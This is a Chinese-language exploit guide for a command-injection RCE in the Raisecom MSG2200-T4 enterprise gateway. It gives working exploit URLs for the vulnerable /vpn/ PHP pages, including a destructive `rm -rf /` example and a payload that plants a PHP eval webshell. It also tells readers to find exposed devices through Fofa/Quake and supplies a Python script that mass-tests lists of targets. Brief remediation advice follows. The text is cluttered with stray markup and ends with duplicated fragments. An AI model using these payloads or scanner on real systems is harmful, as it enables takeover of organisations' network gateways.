瑞斯康达智能网关RCE漏洞分析与复现指南<\/h1>

0x01 漏洞概述<\/h2>
受影响设备<\/strong>: MSG2200-T4型号瑞斯康达多业务智能网关<\/p>
厂商<\/strong>: 瑞斯康达科技发展股份有限公司<\/p>
设备用途<\/strong>: 集数据、语音、安全、无线等多种功能于一体的网络设备，专为中小企业及行业分支机构设计，广泛应用于政企单位、商务楼宇、校园、工业园区等场景。<\/p>
漏洞类型<\/strong>: 远程命令执行(RCE)<\/p>
漏洞危害<\/strong>: 攻击者可通过构造恶意请求在目标设备上执行任意系统命令，获取系统控制权。<\/p>

0x02 漏洞分析<\/h2>
漏洞文件定位<\/h3>
主要漏洞文件位于: \/vpn\/list_base_config.php<\/code><\/p>
漏洞参数<\/h3> 可利用的参数包括:<\/p> type<\/code><\/li> parts<\/code><\/li> pages<\/code><\/li> serch_value<\/code><\/li> <\/ul> 漏洞触发流程<\/h3> 当parts<\/code>参数值为'base_config'<\/code>时，进入对应case分支<\/li> 在'base_config'<\/code>分支中，当type<\/code>参数为'mod'<\/code>时，调用obj_sslvpn<\/code>对象的sslvpn_config_mod(2)<\/code>方法<\/li> 在sslvpn_config_mod<\/code>方法中，未对用户输入的template<\/code>和stylenum<\/code>参数进行过滤，直接拼接执行系统命令<\/li> <\/ol> 漏洞代码分析<\/h3> 漏洞核心代码特征:<\/p> \/\/ 直接使用用户输入构造系统命令 <\/span><\/span><\/span><\/span>$cmd =<\/span> "cp \/www\/tmp\/"<\/span>.<\/span>$_REQUEST['template'<\/span>].<\/span>" \/www\/tmp\/"<\/span>.<\/span>$_REQUEST['stylenum'<\/span>]; <\/span><\/span>system<\/span>($cmd); <\/span><\/span><\/code><\/pre>命令注入示例<\/h3> 攻击者可构造如下恶意输入:<\/p> template=`rm -rf \/` <\/code><\/pre> 导致执行:<\/p> cp \/www\/tmp\/`<\/span>rm -rf \/`<\/span> \/www\/tmp\/[<\/span>stylenum值]<\/span> <\/span><\/span><\/code><\/pre>0x03 影响范围<\/h2> 除\/vpn\/list_base_config.php<\/code>外，以下文件也存在类似漏洞:<\/p> \/vpn\/list_ip_network.php<\/code><\/li> \/vpn\/list_service_manage.php<\/code><\/li> \/vpn\/list_vpn_web_custom.php<\/code><\/li> \/vpn\/vpn_template_style.php<\/code><\/li> <\/ol> 0x04 漏洞复现<\/h2> 准备工作<\/h3> 使用网络空间搜索引擎(如Quake、Fofa)搜索瑞斯康达网关资产<\/li> 识别特征: 特定网页样式和功能<\/li> <\/ol> 基础验证POC<\/h3> 步骤1<\/strong>: 构造命令执行Payload<\/p> http:\/\/[目标IP]\/vpn\/list_base_config.php?type=mod&parts=base_config&template=`echo -e '<?php phpinfo();unlink(__FILE__);?>'>\/www\/tmp\/test.php` <\/code><\/pre> 步骤2<\/strong>: URL编码Payload 将上述Payload进行URL编码后访问:<\/p> http:\/\/127.0.0.1\/vpn\/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftest.php%60 <\/code><\/pre> 步骤3<\/strong>: 验证漏洞存在访问生成的phpinfo页面:<\/p> http:\/\/[目标IP]\/tmp\/test.php <\/code><\/pre> 若显示phpinfo页面则确认漏洞存在<\/p> 深入利用<\/h3> 方法1<\/strong>: 写入Webshell<\/p> http:\/\/[目标IP]\/vpn\/list_base_config.php?type=mod&parts=base_config&template=`echo -e '<?php eval($_POST[cmd]);?>'>\/www\/tmp\/shell.php` <\/code><\/pre> 使用蚁剑等工具连接:<\/p> 地址: http:\/\/[目标IP]\/tmp\/shell.php<\/code><\/li> 密码: cmd<\/code><\/li> <\/ul> 方法2<\/strong>: 反弹Shell 构造反弹shell命令并URL编码后执行<\/p> 0x05 批量检测脚本<\/h2> Python检测脚本示例:<\/p> import<\/span> requests <\/span><\/span>from<\/span> urllib.parse import<\/span> quote <\/span><\/span> <\/span><\/span>def<\/span> check_vuln<\/span>(url): <\/span><\/span> payload =<\/span> "`echo -e '5201314'>\/www\/tmp\/test.php`"<\/span> <\/span><\/span> encoded_payload =<\/span> quote(payload) <\/span><\/span> target =<\/span> f<\/span>"<\/span>{<\/span>url}<\/span>\/vpn\/list_base_config.php?type=mod&parts=base_config&template=<\/span>{<\/span>encoded_payload}<\/span>"<\/span> <\/span><\/span> <\/span><\/span> try<\/span>: <\/span><\/span> requests.<\/span>get(target, timeout=<\/span>5<\/span>) <\/span><\/span> verify_url =<\/span> f<\/span>"<\/span>{<\/span>url}<\/span>\/tmp\/test.php"<\/span> <\/span><\/span> resp =<\/span> requests.<\/span>get(verify_url, timeout=<\/span>5<\/span>) <\/span><\/span> if<\/span> "5201314"<\/span> in<\/span> resp.<\/span>text: <\/span><\/span> print(f<\/span>"[+] Vulnerable: <\/span>{<\/span>url}<\/span>"<\/span>) <\/span><\/span> # 清理测试文件<\/span> <\/span><\/span> clean_payload =<\/span> "`rm \/www\/tmp\/test.php`"<\/span> <\/span><\/span> requests.<\/span>get(f<\/span>"<\/span>{<\/span>url}<\/span>\/vpn\/list_base_config.php?type=mod&parts=base_config&template=<\/span>{<\/span>quote(clean_payload)}<\/span>"<\/span>) <\/span><\/span> else<\/span>: <\/span><\/span> print(f<\/span>"[-] Not vulnerable: <\/span>{<\/span>url}<\/span>"<\/span>) <\/span><\/span> except<\/span> Exception<\/span> as<\/span> e: <\/span><\/span> print(f<\/span>"[!] Error checking <\/span>{<\/span>url}<\/span>: <\/span>{<\/span>str(e)}<\/span>"<\/span>) <\/span><\/span> <\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>: <\/span><\/span> with<\/span> open("url.txt"<\/span>, "r"<\/span>) as<\/span> f: <\/span><\/span> for<\/span> line in<\/span> f: <\/span><\/span> url =<\/span> line.<\/span>strip() <\/span><\/span> if<\/span> url: <\/span><\/span> check_vuln(url) <\/span><\/span><\/code><\/pre>0x06 修复方案<\/h2> 1. 输入验证<\/h3> 对用户输入进行严格验证:<\/p> if<\/span> (!<\/span>preg_match<\/span>('\/^[a-zA-Z0-9_]+$\/'<\/span>, $_REQUEST['template'<\/span>])) { <\/span><\/span> die<\/span>("Invalid template parameter"<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre>2. 安全命令执行<\/h3> 使用参数化方式执行命令:<\/p> $template =<\/span> escapeshellarg<\/span>($_REQUEST['template'<\/span>]); <\/span><\/span>$stylenum =<\/span> escapeshellarg<\/span>($_REQUEST['stylenum'<\/span>]); <\/span><\/span>$cmd =<\/span> "cp \/www\/tmp\/<\/span>{<\/span>$template}<\/span> \/www\/tmp\/<\/span>{<\/span>$stylenum}<\/span>"<\/span>; <\/span><\/span>system<\/span>($cmd); <\/span><\/span><\/code><\/pre>3. 权限控制<\/h3> Web服务器以最低权限运行<\/li> 限制关键目录的写权限<\/li> <\/ul> 4. 日志监控<\/h3> 记录所有执行的系统命令<\/li> 监控异常访问行为<\/li> <\/ul> 5. 补丁更新<\/h3> 联系厂商获取最新安全补丁并应用<\/p> 0x07 总结<\/h2> 该漏洞由于未对用户输入进行过滤，导致攻击者可通过构造恶意参数执行任意系统命令。建议所有使用瑞斯康达MSG2200-T4智能网关的用户立即检查系统安全性，并按照修复方案进行防护。<\/p>

瑞斯康达智能网关RCE漏洞分析与复现指南<\/h1>

漏洞文件定位<\/h3> 主要漏洞文件位于: \/vpn\/list_base_config.php<\/code><\/p>

0x04 漏洞复现<\/h2>

0x06 修复方案<\/h2>

5. 补丁更新<\/h3> 联系厂商获取最新安全补丁并应用<\/p>

0x07 总结<\/h2> 该漏洞由于未对用户输入进行过滤，导致攻击者可通过构造恶意参数执行任意系统命令。建议所有使用瑞斯康达MSG2200-T4智能网关的用户立即检查系统安全性，并按照修复方案进行防护。<\/p>

漏洞文件定位<\/h3>
主要漏洞文件位于: `\/vpn\/list_base_config.php<\/code><\/p>`

5. 补丁更新<\/h3>
联系厂商获取最新安全补丁并应用<\/p>

0x07 总结<\/h2>
该漏洞由于未对用户输入进行过滤，导致攻击者可通过构造恶意参数执行任意系统命令。建议所有使用瑞斯康达MSG2200-T4智能网关的用户立即检查系统安全性，并按照修复方案进行防护。<\/p>